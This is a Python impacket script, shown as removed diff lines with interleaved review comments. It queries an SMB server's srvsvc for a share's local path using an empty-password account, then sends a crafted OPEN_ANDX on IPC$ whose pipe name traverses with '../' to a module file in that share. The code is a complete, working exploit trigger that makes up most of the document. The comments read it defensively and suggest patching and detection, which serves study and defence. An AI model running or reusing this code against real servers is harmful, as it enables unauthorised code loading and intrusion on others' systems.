- from impacket import smb
- from impacket.smbconnection import *
- from impacket.dcerpc.v5 import transport, srvs
# Review summary (defensive reading): this script logs in to an SMB server,
# asks the Server Service (srvsvc) for the share's local filesystem path, and
# then sends a hand-built SMB_COM_OPEN_ANDX on IPC$ whose file name is "\pipe\"
# followed by "../" segments, that local path and a file name. No response is
# read, so the script itself reports nothing about the outcome.
# NOTE(review): a pipe name that carries a filesystem path is not a normal
# client request; presumably the aim is to make the server resolve it to a
# file inside the share -- confirm against the server vendor's advisories.
# Defender takeaways: keep the SMB server patched, avoid shares that guest or
# anonymous accounts can write to, and alert on IPC$ opens whose name contains
# "../" or "/" after "\pipe\".
#
# Target host and the account used for both sessions (note the empty password).
- server = 'localhost'
- user = 'nobody'
- password = ''
# Share whose server-side path is looked up, and the file name appended to it.
- share = 'data'
- module = 'module'
# First session: low-level smb.SMB object, used at the end to send the raw packet.
- s = smb.SMB('A',server)
- s.login(user,password)
# Second session: high-level SMBConnection, used only as the RPC transport.
- smbClient = SMBConnection('A', server)
- smbClient.login(user,password)
# This tree id is never used; `tid` is reassigned by the IPC$ connect below.
- tid=smbClient.connectTree(r'\\A\%s' % share)
# DCE/RPC over the \srvsvc named pipe, bound to the Server Service interface.
- rpctransport = transport.SMBTransport('A', server, filename = r'\srvsvc', smb_connection=smbClient)
- dce = rpctransport.get_dce_rpc()
- dce.connect()
- dce.bind(srvs.MSRPC_UUID_SRVS)
# NetrShareGetInfo at level 2: the reply includes shi2_path, the share's local
# path on the server. Disclosure of that path to a low-privilege account is
# what makes the rest of the script possible.
- resp = srvs.hNetrShareGetInfo(dce, '%s\x00' % share, 2)
# Drops the first two characters and the last one, then switches to forward
# slashes. Presumably this removes a drive prefix and a trailing NUL -- TODO confirm.
- path = resp['InfoStruct']['ShareInfo2']['shi2_path'][2:][:-1].replace("\\","/")
# Pipe-style name with six "../" steps in front of the share path. "\p" and
# "\." are not escape sequences, so the backslashes stay literal; recent Python
# versions warn about such escapes in a non-raw string.
- path = '\pipe\../../../../../..%s' % (path)
# Final name: traversal prefix + share path + "/" + module file name.
- path = r'%s/%s' % (path, module)
# The open request is sent on the IPC$ tree, where named pipes are opened.
- tid = s.tree_connect(r'\\A\IPC$')
# Hand-built SMB1 OPEN_ANDX request: read access, open-existing, with the
# crafted name as FileName.
- packet = smb.NewSMBPacket()
- packet['Tid'] = tid
- openFile = smb.SMBCommand(smb.SMB.SMB_COM_OPEN_ANDX)
- openFile['Parameters'] = smb.SMBOpenAndX_Parameters()
- openFile['Parameters']['DesiredAccess'] = smb.SMB_ACCESS_READ
- openFile['Parameters']['OpenMode'] = smb.SMB_O_OPEN
- openFile['Parameters']['SearchAttributes'] = smb.ATTR_READONLY | smb.ATTR_HIDDEN | smb.ATTR_ARCHIVE
- openFile['Data'] = smb.SMBOpenAndX_Data(flags=smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES)
- openFile['Data']['FileName'] = path
- packet.addCommand(openFile)
# Fire-and-forget: the request is sent and the server's reply is never read.
- s.sendSMB(packet)